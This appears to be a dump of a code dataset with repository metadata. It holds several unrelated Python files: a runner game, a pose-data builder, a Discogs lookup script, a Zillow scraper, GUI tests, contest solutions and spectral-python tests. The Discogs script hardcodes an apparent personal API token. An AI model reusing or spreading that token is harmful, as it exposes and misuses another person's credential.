40\") \n level = (getUpgrade(\"AI\")-10000)//2000\n cost = int(getUpgrade(\"AI\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeAI)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeAI)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"MAGNET\")//1000\n 
canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n buttonCenter = (self.cx, self.cy*1.86)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHome)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HOME\", font = f\"Constantia 40\") \n\n\n\n\n elif self.currentMode == \"play\":\n canvas.create_line(0,self.focus[1],self.width, self.focus[1])\n canvas.create_line(self.focus[0], 0, self.focus[0], self.width)\n\n\n canvas.create_rectangle(0, self.focus[1] - self.cameraPos[1], self.width, self.height, fill = \"skyblue4\", outline = \"\")\n if self.map == \"MALIBU\":\n canvas.create_rectangle(0,0,self.width, self.focus[1] - self.cameraPos[1], fill = \"plum1\", outline = \"\")\n else:\n canvas.create_rectangle(0,0,self.width, self.focus[1] - self.cameraPos[1], fill = \"skyblue\", outline = \"\")\n lanes, rails = self.createLanesAndRails()\n\n for lanes in lanes:\n lanes.render(canvas)\n\n for rails in rails:\n rails.render(canvas)\n\n for plank in self.planks:\n plank.render(canvas)\n\n\n for coin in self.coins:\n coin.render(canvas)\n\n renderOrder = [] #think reverse because what's rendered last is up front\n if self.runner.currentLane == 0:\n renderOrder = [4,3, 2,1,-2,-1,0]\n elif self.runner.currentLane == 1:\n renderOrder = [4,-2,3,-1,2,0,1]\n else:\n renderOrder = [-2,-1,0,4,1,3,2]\n\n newOrder = []\n \n for v in renderOrder:\n for obj in self.objects:\n if obj.lane == v:\n newOrder += [obj]\n\n for obj in newOrder:\n obj.render(canvas)\n\n self.runner.render(canvas)\n\n #display score\n textSize = self.height/40\n canvas.create_rectangle(0,0,self.width,45, fill = \"black\", outline = \"\")\n canvas.create_rectangle(0,self.height-45,self.width,self.height, fill = \"black\", outline = \"\")\n\n canvas.create_text(self.width/2, self.height-textSize, text = f\"MAP: {self.map}\", font = f\"Arial {int(textSize)}\", fill = \"grey\")\n\n canvas.create_text(self.width/2, textSize, text = f\"{self.score}\", font = f\"Arial {int(textSize)}\", fill = \"white\")\n\n #display coins\n canvas.create_text(self.width*.75, textSize, text = f\"COINS: {self.coinsCollected}\", font = f\"Arial {int(textSize)}\", fill = \"yellow\")\n displayMult = self.multiplier\n\n if self.runner.currentPowerUp == \"DOUBLE POINTS\":\n displayMult *= 2\n\n canvas.create_text(self.width*.25, textSize, text = f\"x{displayMult}\", font = f\"Arial {int(textSize)}\", fill = \"cyan\")\n\n #display powerup\n if self.runner.currentPowerUp != None and self.runner.powerUpTimeLeft > 0:\n canvas.create_rectangle(0,45,self.width,70, fill = \"black\", outline = \"\")\n canvas.create_rectangle(0,45,self.width*(self.runner.powerUpTimeLeft/getUpgrade(self.runner.currentPowerUp)),65, fill = \"lime green\", outline = \"\")\n canvas.create_text(self.width/2, 55, text = f\"{self.runner.currentPowerUp}\", font = f\"Arial {15}\", fill = \"white\")\n\n\n if self.transitioning == True:\n inc = math.sin(.5*math.pi*(self.transitionFrame/self.transitionFrames))*self.height/2\n canvas.create_rectangle(0,0,self.width, inc, fill = \"black\")\n canvas.create_rectangle(0,self.height-inc,self.width, self.height, fill = \"black\")\n\n\nMetroMastersApp(width = 900, height = 
900)\n","repo_name":"antoineassaf25/Metro-Masters","sub_path":"metro/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":57287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40441515823","text":"import torch\nfrom types import SimpleNamespace\nfrom tqdm import tqdm\nimport numpy as np\n\n\ndef unpack_train_data(data, dataset, target_key, config):\n '''\n Unpack sample from dataloader & move to GPU\n '''\n if dataset == 'MPii':\n inps = data['pose_input']\n labels = {}\n labels['img_center'] = data['img_center']\n labels[target_key] = data['gt_pose']\n bboxes = data['bbox']\n img_ids = data['img_id'] #torch.ones(len(bboxes)) * -9 # dummy\n img_paths = data['img_path']\n else:\n (inps, labels, img_ids, bboxes) = data\n img_paths = torch.ones(len(bboxes)) * -9 # dummy\n\n if isinstance(inps, list):\n inps = [inp.to(config.device) for inp in inps]\n else:\n inps=inps.to(config.device)\n\n for k, _ in labels.items():\n try:\n labels[k] = labels[k].to(config.device)\n except AttributeError:\n if k == 'img_path': continue\n else: assert k == 'type'\n \n return inps, labels, img_ids, img_paths, bboxes\n\ndef convert_kpts_to_h36m_17s(target_xyzs, dataset, task='train'):\n '''\n Convert joint labels to H36M 17 joints\n '''\n if dataset == 'PW3D':\n return target_xyzs\n elif dataset == 'HP3D':\n if task == 'train':\n EVAL_JOINTS_17 = [\n 4, \n 18, 19, 20, \n 23, 24, 25,\n 3, 5, # 'spine' == spine_extra, 'neck' == throat (not quite 'neck_extra' as desired)\n 6, 7, # \n 9, 10, 11,\n 14, 15, 16,\n ]\n else:\n EVAL_JOINTS_17 = [\n 14, \n 11, 12, 13,\n 8, 9, 10,\n 15, 1, \n 16, 0,\n 5, 6, 7,\n 2, 3, 4,\n ]\n target_xyzs = np.vstack(target_xyzs)\n # target_xyzs = [t.reshape(-1, 3)[EVAL_JOINTS_17].reshape(1,-1) for t in target_xyzs]\n target_xyzs = target_xyzs.reshape(target_xyzs.shape[0], -1 ,3)[:,EVAL_JOINTS_17]\n return target_xyzs.reshape(1, target_xyzs.shape[0], -1)\n if dataset == 'MPii':\n EVAL_JOINTS_17 = [\n 0,\n 1, 4, 7, # LL\n 2, 5, 8, # RL\n 6, 12, # torso, neck\n 15, 15, # (theres no head top unfortunately)\n 16, 18, 20, # LA\n 17, 19, 21, # RA\n ] \n target_xyzs = [np.take(t.reshape(-1, t.shape[1], 3), EVAL_JOINTS_17, axis=1) for t in target_xyzs]\n target_xyzs = [t.reshape(-1, 51) for t in target_xyzs]\n return target_xyzs\n\n\ndef create_cnet_dataset_w_HybrIK(m, config, gt_dataset, dataset, task='train'):\n # Data/Setup\n gt_loader = torch.utils.data.DataLoader(gt_dataset, batch_size=64, shuffle=False, \n num_workers=2, drop_last=False, pin_memory=True)\n m.eval()\n m = m.to(config.device)\n\n opt = SimpleNamespace()\n opt.device = config.device\n opt.flip_test = True\n\n target_keys = {\n 'HP3D': 'target_xyz',\n 'PW3D': 'target_xyz_17',\n 'MPii': 'gt_pose',\n }\n target_key = target_keys[dataset]\n\n backbone_preds, target_xyzs, img_idss, img_pathss = [], [], [], []\n for i, data in enumerate(tqdm(gt_loader, dynamic_ncols=True)):\n inps, labels, img_ids, img_paths, bboxes = unpack_train_data(data, dataset, target_key, opt)\n\n m_output = m(inps, flip_test=opt.flip_test, bboxes=bboxes.to(config.device), img_center=labels['img_center'])\n backbone_pred = m_output.pred_xyz_jts_17\n\n backbone_preds.append(backbone_pred)\n target_xyzs.append(labels[target_key])\n img_idss.append(img_ids)\n # img_pathss.append(img_paths)\n\n # if i > 16: break\n\n print(\"Detaching & reformatting...\")\n backbone_preds = [b.detach().cpu().numpy() for b in backbone_preds]\n backbone_preds = np.concatenate(backbone_preds, 
axis=0)\n    target_xyzs = [t.detach().cpu().numpy() for t in target_xyzs]\n    target_xyz_17s = convert_kpts_to_h36m_17s(target_xyzs, dataset, task=task)\n    target_xyz_17s = np.concatenate(target_xyz_17s, axis=0)\n\n    img_idss = np.concatenate([i.detach().cpu().numpy() for i in img_idss], axis=0).reshape(-1,1)\n\n    # img_names = []\n    # for batch in img_pathss:\n    #     for img_path in batch:\n    #         img_name = img_path.split('/')[-1]\n    #         img_name = img_name.split('.')[0]\n    #         img_names.append(int(img_name))\n    # # img_paths = np.concatenate([int(p.split('/')[-1].split('.')[0]) for p in img_paths], axis=0).reshape(-1,1)\n    # img_pathss = np.array(img_names).reshape(-1,1)\n\n    # Fix scale of MPii pseudo-GT by normalizing the target magnitude to match the backbone preds\n    if dataset == 'MPii':\n        scale_pred = np.linalg.norm(backbone_preds, keepdims=True)\n        scale_gt = np.linalg.norm(target_xyz_17s, keepdims=True)\n        target_xyz_17s /= (scale_gt / scale_pred)\n\n    if task == 'train':\n        dataset_outpath = '{}{}/{}_cnet_hybrik_train.npy'.format(config.cnet_dataset_path, dataset, config.hybrIK_version,)\n    elif task == 'test':\n        dataset_outpath = '{}{}/{}_cnet_hybrik_test.npy'.format(config.cnet_dataset_path, dataset, config.hybrIK_version,)\n    print(\"Saving HybrIK pred dataset to {}\".format(dataset_outpath))\n    np.save(dataset_outpath, np.array([backbone_preds,\n                                    target_xyz_17s,\n                                    np.repeat(img_idss, backbone_pred.shape[1], axis=1),]))\n                                    # np.repeat(img_pathss, backbone_pred.shape[1], axis=1)]))\n    return\n","repo_name":"lbidulka/ESCAPE","sub_path":"core/cnet_data.py","file_name":"cnet_data.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4487500219","text":"#!/usr/bin/python3\nTOKEN=\"RokNHxieRWZySdOCslYJgbJCLGLOtZnVYNIZChsi\"\n\nimport discogs_client\nfrom mixes_extract_mixdb import mixesdb_extractor\nimport slskd_api\n\n\nd = discogs_client.Client('download_mix_files/1.0', user_token=TOKEN)\n\nltracks = mixesdb_extractor.get_list(\"Laurent Garnier\",5)\ntrack = ltracks[5]\nrelease = d.search(track['artist'] + \" - \" + track['title'])[0]\nprint()\nprint('*****')\nprint(track)\nprint()\nprint(release.title)\n\n# for track in ltracks:\n#     if(track):\n#         try:\n#             release = d.search(track['artist'] + \" - \" + track['title'])[0]\n#             print()\n#             print('*****')\n#             print(track)\n#             print()\n#             print(release.title)\n#         except:\n#             pass","repo_name":"mounjichahed/download_mix_files","sub_path":"download_mix_files.py","file_name":"download_mix_files.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16861457333","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\nfrom datetime import datetime\nscope = [\"https://spreadsheets.google.com/feeds\",'https://www.googleapis.com/auth/spreadsheets',\"https://www.googleapis.com/auth/drive.file\",\"https://www.googleapis.com/auth/drive\"]\n\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"creds.json\", scope)\n\nclient = gspread.authorize(creds)\n\n\nsheet = client.open(\"zillow stats capture\")\n # Open the spreadsheet\n\nsheet1 = sheet.sheet1\ncol = sheet1.col_values(1) # Get a specific column\n    \nsession = requests.session()\ntest = pd.DataFrame(columns=['House Link','Timestamp','Time on Zillow','Views','Saves'])\ndef get_data(soup):\n    time = soup.find(text=\"Time on 
Zillow\").parent.next_element.next_element.text\n    views = soup.find(text=\"Views\").next_element.text\n    saves = soup.find(text=\"Saves\").next_element.text\n    return(time,views,saves)\n\ncol.remove(\"House Link\")\nfor house in col:\n    burp0_headers = {\"Sec-Ch-Ua\": \"\\\"Chromium\\\";v=\\\"91\\\", \\\" Not;A Brand\\\";v=\\\"99\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n    data = session.get(house, headers=burp0_headers)\n    soup = BeautifulSoup(data.text, 'html.parser')\n\n    time, views, saves = get_data(soup)\n    now = datetime.now()\n    dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n    data = {\"House Link\": house,\"Timestamp\": dt_string,\"Time on Zillow\": time, 'Views': views, 'Saves': saves}\n    test = test.append(data, ignore_index=True)\n    #print(f\"Time on Zillow: {house_data[0]}\\nViews: {house_data[1]}\\nSaves: {house_data[2]}\")\n\nsheet1.update([test.columns.values.tolist()] + test.values.tolist())","repo_name":"Ranger11Danger/random_webscrapers","sub_path":"zillow2gsheets.py","file_name":"zillow2gsheets.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7483759487","text":"import unittest\nimport main\nimport tkinter as tk\nimport os\nimport csv\nimport json\n\n\nclass TestCTI(unittest.TestCase):\n\n    def setUp(self):\n        self.app = main.window\n\n    def tearDown(self):\n        self.app.update()\n        self.app.destroy()\n\n    def test_window_title(self):\n        self.assertEqual(self.app.title(), \"Select Profile\")\n\n    def test_window_size(self):\n        self.assertEqual(self.app.geometry(), \"550x350\")\n\n    def test_label_text(self):\n        label = self.app.children['!label']\n        self.assertEqual(label.cget('text'), \"Welcome to ThreatLink Intelligence\")\n\n    def test_buttons_exist(self):\n        button_frame = self.app.children['!frame']\n        analyst_button = button_frame.children['!button']\n        management_button = button_frame.children['!button2']\n        csirt_button = button_frame.children['!button3']\n\n        self.assertIsNotNone(analyst_button)\n        self.assertIsNotNone(management_button)\n        self.assertIsNotNone(csirt_button)\n\n    def test_button_text(self):\n        button_frame = self.app.children['!frame']\n        analyst_button = button_frame.children['!button']\n        management_button = button_frame.children['!button2']\n        csirt_button = button_frame.children['!button3']\n\n        self.assertEqual(analyst_button.cget('text'), \"Analyst\")\n        self.assertEqual(management_button.cget('text'), \"Management\")\n        self.assertEqual(csirt_button.cget('text'), \"CSIRT\")\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"rayhaan1/ThreatLinkIntelligence","sub_path":"IntegrationTests.py","file_name":"IntegrationTests.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4060400846","text":"# 7569 Tomato\r\nimport sys\r\nfrom collections import deque\r\n\r\ninput = sys.stdin.readline\r\n\r\ndx = 
[-1,1,0,0,0,0]\r\ndy = [0,0,-1,1,0,0]\r\ndz = [0,0,0,0,-1,1]\r\n\r\nM, N, H = map(int, input().split(\" \"))\r\ngraph = []\r\ntemp = []\r\ntomato = []\r\n# M is the number of horizontal cells, N the number of vertical cells, H the height (number of layers)\r\n\r\nfor z in range(H):\r\n    for y in range(N):\r\n        temp2 = list(map(int, input().split(\" \")))\r\n        for i in range(M):\r\n            if temp2[i] == 0:\r\n                temp2[i] = -2\r\n            elif temp2[i] == 1:\r\n                temp2[i] = 0\r\n                tomato.append([i,y,z])\r\n        temp.append(temp2)\r\n    graph.append(temp)\r\n    temp = []\r\n    \r\n#print(graph)\r\n#print(tomato)\r\n\r\ndef bfs(x,y,z):\r\n    q = deque([[x,y,z]])\r\n    graph[z][y][x] = 0\r\n\r\n    while q:\r\n        x1, y1, z1 = q.popleft()\r\n        # print(x1, y1, z1)\r\n\r\n        for i in range(6):\r\n            nx = x1 + dx[i]\r\n            ny = y1 + dy[i]\r\n            nz = z1 + dz[i]\r\n\r\n            if nx < 0 or ny < 0 or nz < 0 or nx > M-1 or ny > N-1 or nz > H-1:\r\n                continue\r\n\r\n            if graph[nz][ny][nx] == -1:\r\n                continue\r\n            \r\n            \r\n            if graph[nz][ny][nx] < 0 or graph[z1][y1][x1] + 1 < graph[nz][ny][nx]:\r\n                graph[nz][ny][nx] = graph[z1][y1][x1] + 1\r\n                q.append([nx, ny, nz])\r\n    \r\n\r\n# the coordinates are ordered z, y, x \r\n\r\nfor x, y, z in tomato:\r\n    #print(x,y,z)\r\n    bfs(x,y,z)\r\n\r\n#print(graph)\r\ncurMax = 0\r\nfinal = 0\r\n\r\n\r\nfor z in range(H):\r\n    for y in range(N):\r\n        if -2 in graph[z][y]:\r\n            final = -1\r\n        else:\r\n            curMax = max(curMax, max(graph[z][y]))\r\n\r\nif final == -1:\r\n    print(-1)\r\nelse:\r\n    print(curMax)","repo_name":"SongDerrick/BOJ_PS","sub_path":"백준/Gold/7569. 토마토/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"2961503567","text":"from PyQt6.QtWidgets import QApplication, QMainWindow, QWidget,QLineEdit,QLabel,QVBoxLayout,QPushButton, QMessageBox\r\n\r\nclass Wwindow5(QMainWindow):\r\n    def __init__(self):\r\n        super().__init__()\r\n        \r\n        layout = QVBoxLayout()\r\n        self.login_lbl = QLabel(\"Вы успешно прошли тест\")\r\n        \r\n        self.exit_btn = QPushButton(\"завершить\")\r\n        \r\n        \r\n        layout.addWidget(self.login_lbl)\r\n        layout.addWidget(self.exit_btn)\r\n        \r\n        \r\n        self.exit_btn.clicked.connect(self.exit)\r\n        \r\n        widget = QWidget()\r\n        widget.setLayout(layout)\r\n        self.setCentralWidget(widget)\r\n        \r\n        with open(\"style.css\", \"r\") as css:\r\n            widget.setStyleSheet(css.read())\r\n        \r\n    def exit(self):\r\n        self.close()\r\n","repo_name":"Evgen792/prog","sub_path":"window5.py","file_name":"window5.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17893887401","text":"'''\nRuns unit tests for various SPy spatial functions.\n\nTo run the unit tests, type the following from the system command line:\n\n    # python -m spectral.tests.spatial\n'''\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom warnings import warn\n\nimport spectral as spy\nfrom spectral.algorithms.spatial import (get_window_bounds,\n                                        get_window_bounds_clipped,\n                                        map_class_ids, map_classes,\n                                        map_window)\nfrom spectral.tests.spytest import SpyTest\n\n\nclass SpatialWindowTest(SpyTest):\n    '''Tests various spatial functions.'''\n\n    def setup(self):\n        self.data = spy.open_image('92AV3C.lan').load()\n\n    def test_get_window_bounds(self):\n        assert(get_window_bounds(90, 90, 3, 7, 30, 40) == (29, 32, 37, 44))\n\n    def test_get_window_bounds_border(self):\n        assert(get_window_bounds(90, 90, 3, 7, 0, 2) == (0, 3, 0, 7))\n\n    def 
test_get_window_bounds_clipped(self):\n assert(get_window_bounds_clipped(90, 90, 3, 7, 30, 40) \\\n == (29, 32, 37, 44))\n\n def test_get_window_bounds_clipped_border(self):\n assert(get_window_bounds_clipped(90, 90, 3, 7, 0, 2) == (0, 2, 0, 6))\n\n def test_map_window(self):\n '''Test computing spectra average over local window.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (10, 50), (20, 40))\n t = np.mean(X[9:12, 18:23].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[0, 0], t)\n\n def test_map_window_clipped(self):\n '''Test spatial averaging near border with clipped window.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (100, None), (100, None), border='clip')\n t = np.mean(X[-2:, -3:].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[-1, -1], t)\n\n def test_map_window_shifted(self):\n '''Test spatial averaging near border with shifted window.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (100, None), (100, None), border='shift')\n t = np.mean(X[-3:, -5:].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[-1, -1], t)\n\n def test_map_window_stepped(self):\n '''Test spatial averaging with non-unity row/column step sizes.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = map_window(f, X, (3, 5), (30, 60, 3), (70, 100, 4), border='shift')\n t = np.mean(X[32:35, 72:77].reshape((-1, X.shape[-1])), axis=0)\n assert_allclose(y[1, 1], t)\n\nclass MapClassesTest(SpyTest):\n '''Test mapping of class indices between classification images.'''\n\n def setup(self):\n self.gt = spy.open_image('92AV3GT.GIS').read_band(0)\n\n def test_map_class_ids_identity(self):\n '''Mapping a class image back to itself should yield identity map.'''\n gt = np.array(self.gt)\n d = map_class_ids(gt, gt)\n for i in set(gt.ravel()):\n assert(i in d)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_identity_unlabeled(self):\n '''Mapping a class image back to itself with an unlabeled class.'''\n gt = np.array(self.gt)\n d = map_class_ids(gt, gt, unlabeled=0)\n for i in set(gt.ravel()):\n assert(i in d)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_identity_multiple_unlabeled(self):\n '''Mapping a class image back to itself with unlabeled classes.'''\n gt = np.array(self.gt)\n d = map_class_ids(gt, gt, unlabeled=[2, 4])\n for i in set(gt.ravel()):\n assert(i in d)\n for (i, j) in d.items():\n assert(j == i)\n\n def test_map_class_ids_isomorphic(self):\n '''Test map_class_ids with isomorphic classes.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt, gt2)\n for (i, j) in d.items():\n assert(j == i + 1)\n\n def test_map_class_ids_isomorphic_background(self):\n '''Test map_class_ids with isomorphic classes and background arg.'''\n gt = np.array(self.gt)\n gt2 = gt + 1\n d = map_class_ids(gt, gt2, unlabeled=0)\n assert(d[0] == 0)\n d.pop(0)\n for (i, j) in d.items():\n assert(j == i + 1)\n\n def test_map_class_ids_src_gt_dest(self):\n '''Test map_class_ids with more classes in source image.'''\n gt = np.array(self.gt)\n\n (i, j) = (100, 30)\n old_label = gt[i, j]\n new_label = max(set(gt.ravel())) + 10\n gt2 = np.array(gt)\n gt2[i, j] = new_label\n \n d = map_class_ids(gt2, gt)\n # There are enough pixels for each class that a new single-pixel class\n # should not be mapped to one of the existing 
classes.\n        assert(d[new_label] not in gt)\n        d.pop(new_label)\n        for (i, j) in d.items():\n            assert(j == i)\n\n    def test_map_class_ids_dest_gt_src(self):\n        '''Test map_class_ids with more classes in dest image.'''\n        gt = np.array(self.gt)\n\n        (i, j) = (100, 30)\n        old_label = gt[i, j]\n        new_label = max(set(gt.ravel())) + 10\n        gt2 = np.array(gt)\n        gt2[i, j] = new_label\n        \n        d = map_class_ids(gt, gt2)\n        for (i, j) in d.items():\n            assert(j == i)\n\n    def test_map_classes_isomorphic(self):\n        '''map_classes should map isomorphic class image back to original.'''\n        gt = np.array(self.gt)\n        gt2 = gt + 1\n        d = map_class_ids(gt2, gt)\n        result = map_classes(gt2, d)\n        assert(np.alltrue(result == gt))\n        \n    def test_map_fails_allow_unmapped_false(self):\n        '''map_classes should raise ValueError if image has unmapped value.'''\n        gt = np.array(self.gt)\n        gt2 = gt + 1\n        d = map_class_ids(gt2, gt)\n        d.pop(1)\n        try:\n            result = map_classes(gt2, d)\n        except ValueError:\n            pass\n        else:\n            assert(False)\n        \n    def test_map_allow_unmapped_true(self):\n        '''map_classes should leave unmapped values unchanged if allow_unmapped is True.'''\n        gt = np.array(self.gt)\n        gt2 = gt + 1\n        d = map_class_ids(gt2, gt)\n        d.pop(1)\n        result = map_classes(gt2, d, allow_unmapped=True)\n        assert(np.alltrue(result[gt2 == 1] == 1))\n        \ndef run():\n    print('\\n' + '-' * 72)\n    print('Running spatial tests.')\n    print('-' * 72)\n    for T in [SpatialWindowTest, MapClassesTest]:\n        T().run()\n\nif __name__ == '__main__':\n    from spectral.tests.run import parse_args, reset_stats, print_summary\n    parse_args()\n    reset_stats()\n    run()\n    print_summary()\n","repo_name":"spectralpython/spectral","sub_path":"spectral/tests/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"75"} +{"seq_id":"40056017147","text":"\"\"\"\r\nLargest palindrome product\r\nProblem 4\r\nPublished on Friday, 16th November 2001, 06:00 pm; Solved by 292716; Difficulty rating: 5%\r\nA palindromic number reads the same both ways. 
The largest palindrome made from the product of two 2-digit numbers \r\nis 9009 = 91 x 99.\r\n\r\nFind the largest palindrome made from the product of two 3-digit numbers.\r\n\"\"\"\r\ndef product_palindrome(lo, hi):\r\n largest = 0\r\n for i in range(lo, hi, 1):\r\n for j in range(lo, hi, 1):\r\n pal = True\r\n backwards = str(i * j)[::-1]\r\n index = 0\r\n for f in str(i * j):\r\n if f != backwards[index]:\r\n pal = False\r\n break\r\n index += 1\r\n if pal == True and (i * j) > largest:\r\n largest = (i * j)\r\n return largest\r\n\r\nprint(product_palindrome(100, 1000))\r\n\r\n\r\n","repo_name":"ggorlen/euler","sub_path":"p004.py","file_name":"p004.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21182896602","text":"import random\nimport jogos\ndef jogar():\n\n print(\"*********************************\")\n print(\"Bem vindo ao jogo de Adivinhação!\")\n print(\"*********************************\")\n numero_secreto = random.randrange(1,101)\n total_de_tentativas = 0\n pontos = 1000\n escolhe_nivel = True\n while escolhe_nivel:\n print(\"Qual nível de dificuldade?\")\n print(\"(1) Fácil (2) Médio (3) Difícil (0) Voltar\")\n nivel = input(\": \")\n if(nivel == '1'):\n total_de_tentativas = 20\n escolhe_nivel = False\n elif(nivel == '2'):\n total_de_tentativas = 10\n escolhe_nivel = False\n elif(nivel == '3'):\n total_de_tentativas = 5\n escolhe_nivel = False\n elif (nivel == '0'):\n jogos.escolhe_jogo()\n escolhe_nivel = False\n else:\n print(\"Entrada invalida!!!\\n\")\n\n for rodada in range(1, total_de_tentativas + 1):\n print(\"Tentativa {} de {}\".format(rodada, total_de_tentativas))\n\n chute_str = input(\"Digite um número entre 1 e 100: \")\n print(\"Você digitou \" , chute_str)\n try:\n chute = int(chute_str)\n except:\n print(\"Você deve digitar um número entre 1 e 100!\")\n #rodada -= 1\n continue\n\n if(chute < 1 or chute > 100):\n print(\"Você deve digitar um número entre 1 e 100!\")\n continue\n\n acertou = chute == numero_secreto\n maior = chute > numero_secreto\n menor = chute < numero_secreto\n\n if(acertou):\n print(\"Você acertou e fez {} pontos!\".format(pontos))\n break\n else:\n if(maior):\n print(\"Você errou! O seu chute foi maior do que o número secreto.\\n\")\n elif(menor):\n print(\"Você errou! O seu chute foi menor do que o número secreto.\")\n pontos_perdidos = abs(numero_secreto - chute)\n pontos = pontos - pontos_perdidos\n if (chute != numero_secreto):\n print(\"O numero correto é {}\".format(numero_secreto))\n\n print(\"Fim do jogo\\n\\n\")\n #jogos.escolhe_jogo()\n jogar()\n\nif(__name__ == \"__main__\"):\n jogar()\n","repo_name":"gilassisoliviera/PYTHON","sub_path":"advinhacao/adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14218387076","text":"# Write a python program to:\n\t# a. Find the sequences of one uppercase letter followed by lowercase letters\n\t# b. Match a word containing z\n\t# c. Match a string containing only uppercase, lowercase letters, numbers and underscores\n\t# d. 
To remove leading zeros from an IP address\n\nimport re\n\n\ndef sequence_found(text):\n    pattern = '[A-Z]+[a-z]+$'\n    if re.search(pattern, text):\n        print(\"Match Found\")\n    else:\n        print(\"No Match Found\")\n\n\ndef z_found(text1):\n    res = re.findall(r'\w*z\w*|\w*Z\w*', text1)\n    if (len(res) == 0):\n        print(\"No Match found\")\n    else:\n        print(\"Match found, word containing z\")\n        print(res)\n\n\ndef specialchar_found(text1):\n    patterns = '^[a-zA-Z0-9_]*$'\n    if re.search(patterns, text1):\n        print(\"Found a Match!!\")\n    else:\n        print(\"Not Matched!!\")\n\n\nwhile (1):\n    print(\n        \"1. For some sequences of one uppercase letter followed by lowercase letters\"\n    )\n    print(\"2. For match word containing z\")\n    print(\n        \"3. For strings containing only uppercase, lowercase letters, numbers and underscores\"\n    )\n    print(\"4. For to remove leading zeros from an IP address\")\n    print(\"5. For exit\")\n    print(\"Enter your choice:\", end=\" \")\n    choice = int(input())\n    if choice == 1:\n        st = input(\"Enter a string: \")\n        sequence_found(st)\n    elif choice == 2:\n        st = input(\"Enter a string: \")\n        z_found(st)\n    elif choice == 3:\n        st = input(\"Enter a string: \")\n        specialchar_found(st)\n    elif choice == 4:\n        ip = input(\"Enter an IP address: \")\n        ip = \".\" + ip\n        print(ip)\n        ip = re.sub('\\.[0]+', '.', ip)\n        ip = ip[1:]\n        print(\"IP address after removing leading zeros: \", ip)\n    elif choice == 5:\n        break\n    else:\n        print(\"Invalid choice you 